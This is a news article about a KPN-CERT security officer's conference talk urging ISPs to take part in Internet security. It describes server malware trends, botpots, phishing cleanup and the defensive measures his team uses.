Lax ISPs add to Internet security problem

Open source tools and content systems remain vulnerable.

If ISPs are not trying to be part of the Internet security solution then they are part of the problem and customers should vote with their feet, according to a security officer of a European communications and hosting company.

Scott McIntyre is one of six security officers at KPN-CERT, the Dutch equivalent to AusCERT, and is visiting Australia for the annual conference.

McIntyre believes there is a clear business case for ISPs developing a security practice and a lot of ISPs in Europe are adopting KPN-CERT's practices.

"There is plenty of evil out there and as a provider we have a role to play, like consumers, vendors, and the government," McIntyre said.

McIntyre believes providers should want to invest in security to protect their reputation, and responsible collaboration yields positive results.

He also offered a pragmatic solution: "If you burn the Internet and start over everything will be just fine!"

Given that's unlikely to happen, McIntyre offered a number of recommendations ISPs can adopt to reduce the threat to their hosting customers.

"Public enemy number one are the servers you are running," he said. "Most Windows installs are administered from Russia or Romania via a few gateways.

"I have to check every system we have and everything is run on FreeBSD."

McIntyre runs scripts to determine if rogue software is running on his machines and "on a good day" there is one unknown process, but the average may be six or so and the customers don't know about it.

The top server threats evolve around a lot of malware based on PHP injection, Perl code, and an increasing trend is iFrame targeted attacks.

"We've seen tens of thousands of types of malware and now can see over 250,000 against one Web site in one week. They are looking for vulnerable content systems like Joomla," McIntyre said.

Every day McIntyre and his team scans through access logs looking for malicious code and can identify PHP injection attacks.

"If you look - even if you are not vulnerable - it's good intelligence to see what the bad guys are up to," he said. "I take the IP addresses and send them to organizations like AusCERT so we make sure others are aware of the problems."

Last year McIntyre had less than 8,000 bad URLs and this year alone the team has seen over 6,000 and "every one of those servers are owned by the bad guys".

"They have very user friendly HTTP-based malware to compromise systems, it is just a little bit of Perl and PHP. It was written in Russian but they translated it into English.

Page Break

In another phishing case a customer was compromised with a PHP injection and Perl bots were installed.

"I looked around and found five more phishers and the customer removed the site and said they fixed the plug, but the phishers returned," McIntyre said. "It turned out every day the customer was re-uploading the phishing sites and restoring them from a backup."

There is certainly no shortage of bots as McIntyre runs a number of "botpots" based on Unix to attract bots.

This year botpot One has seen some 29,000 bots so far, botpot Two about 200,000 and botpot Three has just under a million systems from over the world.

"The point is we are proactive and if you are not contributing in some way you are making it worse for the Internet," he said. "There is plenty of malware out there and the script kiddies are out there, but the big guys are doing it for the money. It's worrying how much information is out there and how cheap it is. The underground economy is rife with this stuff."

There are now targets for Web-based e-mail systems and the known attack is sent around the world with a one to two percent success rate, but even that's enough.

What else can ISPs do to keep customer accounts secure? Well, according to McIntyre the overall procedure is quite simple.

"We find the problem and we are looking for the trouble," he said. "We have notification ritual telling people they have a problem and we give them free anti-virus tools and try to make the bar as low as possible."

They also use a ticketing system for abuse matters and if your ISP doesn't have one "run away".

"We also created a walled garden environment where the customer can get information online without being put at risk," McIntyre said. "We use policy-based routing for HTTP content and have firewall rules in the router that limits customer traffic."

McIntyre's team is now developing some custom filters as a preventative measure.

"We want to prevent the bot from becoming a spam relay. It is not being used for abuse handling and not based on DPI, its purely port based," he said. "I've got 120Gbps of traffic so show me the hardware that can do DPI on that at a less than the cost of Australia!"